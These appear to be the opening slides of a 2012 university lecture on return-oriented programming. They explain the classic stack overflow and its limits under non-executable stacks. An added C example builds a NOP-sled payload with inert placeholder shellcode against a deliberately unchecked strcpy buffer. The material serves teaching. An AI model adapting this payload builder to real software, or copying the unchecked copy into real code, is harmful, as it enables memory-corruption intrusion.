Return-Oriented Programming
Scott Hand
CS 6v81.005 Spring 2012
Traditional Stack Overflow
[Figure: stack layout of the classic overflow payload: NOP sled, payload (shellcode), saved EIP]
Traditional Stack Overflow
•
The simplest stack overflow exploit works as follows:
1. Send a payload consisting of a NOP sled, shellcode, and a
pointer into the NOP sled
2. The pointer overwrites the saved return address, so when
the function returns it is loaded into EIP
3. EIP now lands somewhere in the NOP sled, slides into the
shellcode, and the program executes the attacker's machine code
Evaluation
•
Pros
▫ Very easy to trigger
▫ Simple to understand
▫ Being able to inject code makes the payload powerful and
flexible
•
Cons
▫ Defeated simply by making the stack non-executable (NX/DEP):
the injected shellcode can no longer run
▫ Lots of practical problems: bad characters (e.g. a NUL byte
that terminates the copy), limited buffer sizes, payload
detection, etc.
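The three-step layout above and the "bad characters" caveat, as an added worked example that is not part of the original slides. It builds the payload for a hypothetical 32-bit x86 function with a 64-byte stack buffer (the buffer size, the 4-byte saved EBP, the sample return address and the inert stand-in shellcode are all assumptions), rejects return addresses containing bytes that strcpy or gets would truncate on, and checks that the chosen address actually lands inside the NOP sled. It only constructs the bytes; it does not run them.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed target frame: char buf[64] followed by saved EBP (4 bytes) and saved EIP (4 bytes). */
#define BUF_SIZE  64
#define SAVED_EBP 4
#define RET_OFF   (BUF_SIZE + SAVED_EBP)   /* offset of saved EIP from the start of buf */
#define NOP       0x90                     /* x86 single-byte NOP */

/* Stand-in "shellcode": four int3 breakpoints, so the bytes are inert if ever executed. */
static const uint8_t shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Hypothetical vulnerable callee (not executed here): strcpy stops at the first NUL byte. */
void vuln(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);
}

/* Bytes that break string-based delivery: NUL ends strcpy, '\n' ends gets/fgets. */
int has_bad_char(uint32_t addr) {
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(addr >> (8 * i));
        if (b == 0x00 || b == 0x0a)
            return 1;
    }
    return 0;
}

/* Length of the NOP sled: everything before the shellcode, which sits just below saved EBP. */
size_t sled_len(void) {
    return RET_OFF - sizeof shellcode;
}

/*
 * Lay out [NOP sled][shellcode][ret_addr] so that the sled fills buf and the saved EBP,
 * the shellcode ends at the saved EIP, and ret_addr (little-endian) overwrites saved EIP.
 * Returns the payload length, or -1 if ret_addr has a bad byte or out is too small.
 */
int build_payload(uint8_t *out, size_t out_len, uint32_t ret_addr) {
    size_t total = RET_OFF + 4;
    if (has_bad_char(ret_addr) || out_len < total)
        return -1;
    memset(out, NOP, sled_len());
    memcpy(out + sled_len(), shellcode, sizeof shellcode);
    for (int i = 0; i < 4; i++)                      /* x86 is little-endian */
        out[RET_OFF + i] = (uint8_t)(ret_addr >> (8 * i));
    return (int)total;
}

/* Given an assumed address of buf, does ret_addr land somewhere inside the sled? */
int lands_in_sled(uint32_t buf_addr, uint32_t ret_addr) {
    return ret_addr >= buf_addr && ret_addr < buf_addr + (uint32_t)sled_len();
}

int main(void) {
    uint8_t payload[128];
    uint32_t guess = 0xbffff5e0u;   /* assumed address somewhere inside buf */
    int n = build_payload(payload, sizeof payload, guess);
    if (n < 0) {
        puts("bad return address or buffer too small");
        return 1;
    }
    for (int i = 0; i < n; i++)
        printf("%02x%s", payload[i], (i % 16 == 15) ? "\n" : " ");
    putchar('\n');
    return 0;
}
```

The sled is what makes an imprecise address guess survivable: any return address within the 64-byte sled executes NOPs until it reaches the shellcode, so only the saved EIP needs a valid, bad-character-free value.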